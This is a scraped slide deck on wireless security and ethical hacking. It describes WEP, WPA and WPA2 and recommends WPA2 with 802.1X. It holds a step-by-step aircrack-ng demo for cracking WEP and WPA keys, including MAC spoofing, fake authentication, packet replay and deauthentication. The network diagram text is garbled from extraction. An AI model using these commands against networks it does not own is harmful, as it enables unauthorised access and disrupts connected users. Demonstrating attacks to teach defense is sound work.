Get documents about "Network Security and Ethical Hacking
Document Sample
Network Security and Ethical Hacking
- Wireless
Jason Maynard
CCDA, CCIP, CCNP, GSEC, GCFW
Infrastructure Architect
Network Security and Ethical Hacking
- Wireless
• Is it Secure?
It really depends on the
methods used to secure it.
Network Security and Ethical Hacking
- Wireless
Encryption and Authentication Methods
Network Security and Ethical Hacking
- Wireless
WEP
Short for Wired Equivalent Privacy, a security protocol for
wireless local area networks (WLANs) defined in the 802.11b
standard.
Network Security and Ethical Hacking
- Wireless
WPA
Short for Wi-Fi Protected Access, a Wi-Fi standard that was
designed to improve upon the security features of WEP.
Network Security and Ethical Hacking
- Wireless
WPA2
Short for Wi-Fi Protected Access 2, the follow on
security method to WPA for wireless networks that
provides stronger data protection and network access
control, Based on the IEEE 802.11i standard
Network Security and Ethical Hacking
- Wireless
Mac Authentication is easy to sniff and spoof,
can still get the SSID by sniffing the network
Network Security and Ethical Hacking
- Wireless
Couple of demos
• WEP
• WPA
Network Security and Ethical Hacking
- Wireless
Items Needed
• USB Key with Backtrack3 (Linux distro used for ethical hacking)
• DWA-642 PCMICA Card (atheros chipset and uses the madwifi-ng driver)
• Access Point running WEP and then run WPA
• 2 Client Laptops running Linux and Windows connecting to the AP
Network Security and Ethical Hacking
- Wireless
Command Line Tools
•ifconfig
•iwconfig
•macchanger
•airmon-ng
•airdump-ng
•airreplay-ng
•aircrack-ng
Network Security and Ethical Hacking
- Wireless
Open a couple of terminals
– Type “iwconfig” identify the cards
– Type “ifconfig” determine which cards are up
– Type “airmon-ng stop wifi0” and “airmon-ng stop ath0” to ensure the
cards are not running in monitor mode
– Type “ifconfig ath0 down” and “ifconfig wifi0 down” to ensure the
interface is down
Network Security and Ethical Hacking
- Wireless
– Type “maccchanger –mac 00:11:22:33:44:55 wifi0” changes mac address
– Type “airmon-ng start wifi0” put card in monitor mode
– Type “airodump ath0” find AP that is running WEP or WPA then copy the SSID – stop the
scan
WEP Cracking
– Type “airodump –w wep.cap –c “channel #” –bssid “SSID in HEX” ath0” (this captures
packets sent to the AP)
– New Terminal
– Type “aireplay-ng -1 0 –a “SSID” –h “MAC in HEX” ath0” (this fakes authentication)
Network Security and Ethical Hacking
- Wireless
– Go to another terminal
– Type “aireplay-ng -2 –p 0841 -b “SSID” –h “MAC in HEX” ath0” (interactive packet replay)
– Go to another terminal
– Type “aircrack-ng wep*.cap”
WPA Cracking
– Type “airodump –w wpa.cap –c “channel #” –bssid “SSID in HEX” ath0” (this captures packets sent to
the AP)
– Type “aireplay-ng -0 5 -a “SSID” ath0” (DEAuthentication)
– Type “aircrack-ng -0 –x2 wpa*.cap –w /pentest/wireless/aircrack-ng/test/password.lst”
Network Security and Ethical Hacking
- Wireless
So what do I do to protect my network and
wireless users?
Network Security and Ethical Hacking
- Wireless
Use WPA2 with 802.1x
Network Security and Ethical Hacking
- Wireless
WPA2 provides government grade security by
implementing the National Institute of Standards
and Technology (NIST) FIPS 140-2 compliant AES
encryption algorithm and 802.1x-based
authentication
Network Security and Ethical Hacking
- Wireless
802.1X provides port-based authentication,
which involves communications between a
supplicant, authenticator, and authentication
server.
Network Security and Ethical Hacking
- Wireless
802.1X – The most secure methods
• EAP – PEAP
• EAP – TLS
Network Security and Ethical Hacking
- Wireless
EAP – PEAP
• Uses Server certificates and MSCHAPv2
Network Security and Ethical Hacking
- Wireless
EAP – TLS
• One of the most secure methods uses client
and server certificate. More difficult to
manage.
Network Security and Ethical Hacking
- Wireless
Wireless LAN Solution
Remote Sites
Catalyst 3560 SERIES PoE-48
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48
1X 15X 17X 31X 33X 47X
SYST
RPS 1 3
Mississauga
STAT
DUPLX
SPEED 2 4
POE
2X 16X 18X 32X 34X 48X
MODE
Cisco LWAPP gets its 3.Cisco ACS forwards
configuration from the the credentials to the
2.Cisco WLC forwards
WLC using LWAPP Netware 6.5 SP 5 server
the users credential to
CISCO AIRONET 1200 I WIRELESS ACCESS POINT
protocol. or Windows 2003 Ent
the ACS server.
Server running ACS 4.0
Cisco WLC 4400 will have Edirectory
LINK ACT LINK ACT
Cisco 4400 Series
WIRELESS LAN CONTROLLER installed locally making
Cisco 1242 LWAPP
STATUS PS1 LINK
it more secure.
ACT
ALARM PS2
SERVICE CONSOLE UTILITY 1 2 MODEL 4402 25 AP
using HREAP to do Cisco 4500
local switching. Power Supply 1 Power Supply 2
Catalyst
4000 SERIES GOOD GOOD
FAIL FAIL
100-240 V 100-240 V
9-4A 9-4A
SSL LDAP
650 W 650 W
60/50 Hz 60/50 Hz
1
WS-X4548-GB-RJ45V
MAX 15.4W/PORT
STATUS
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
48-PORT
17
18
10/100/1000 BASE T
19
20
21
22
23
24
25
26
27
28
29
30
31
32
MULTI-SPEED
33
34
GIGABIT ETHERNET
35
36
37
38
39
40
41
42
43
44
45
46
47
48
Windows 2003 Ent Server
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
IN-LINE POWER 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32
SWITCHING MODULE 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48
2
WS-X4548-GB-RJ45V 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48 running ACS 4.0
MAX 15.4W/PORT
48-PORT MULTI-SPEED
STATUS 10/100/1000 BASE T GIGABIT ETHERNET
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
IN-LINE POWER 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32
SWITCHING MODULE 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48
WS-X4548-GB-RJ45V 1 3 5 7 9 11 13 15 17 19 21 23 25 27 29 31 33 35 37 39 41 43 45 47
2 4 6 8 10 12 14 16 18 20 22 24 26 28 30 32 34 36 38 40 42 44 46 48
3
MAX 15.4W/PORT
4. Novell checks its
48-PORT MULTI-SPEED
STATUS 10/100/1000 BASE T GIGABIT ETHERNET
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
IN-LINE POWER 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32
SWITCHING MODULE 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48
directory services for
Cisco LWAPP gets its
the user account and
configuration from the
validates the users
WLC using LWAPP
credentials.
protocol.
HP Laptop CISCO AIRONET 1200 I WIRELESS ACCESS POINT
802.1x (EAP-PEAP)
WPA2 SSL LDAP
Cisco 1242 LWAPP
1. Users enter their
Novell Credentials to Novell Netware 6.5 SP5
log onto the Wireless
network.
5.Users is granted
access to WLAN.
HP Laptop
802.1x (EAP-PEAP)
WPA2
Network Security and Ethical Hacking
- Wireless
Supporting Products:
• FreeRadius and OpenSSL
• Microsoft Radius and Group Policy, Certificate Services
• Cisco ACS server and Local Authentication/AD/NDS
Network Security and Ethical Hacking
Support Products Links:
- Wireless
Backtrack
• http://www.remote-exploit.org/backtrack_download.html
FreeRadius and OpenSSL
• http://wiki.freeradius.org
• http://www.openssl.org
Cisco ACS
• http://www.cisco.com/en/US/products/sw/secursw/ps2086
Microsoft
• http://www.microsoft.com/technet/security/prodtech/windowsserver20
03/pkiwire/swlan.mspx?mfr=true
• http://technet.microsoft.com/en-us/magazine/cc162468.aspx
Network Security and Ethical Hacking
- Wireless
Questions?
Related docs
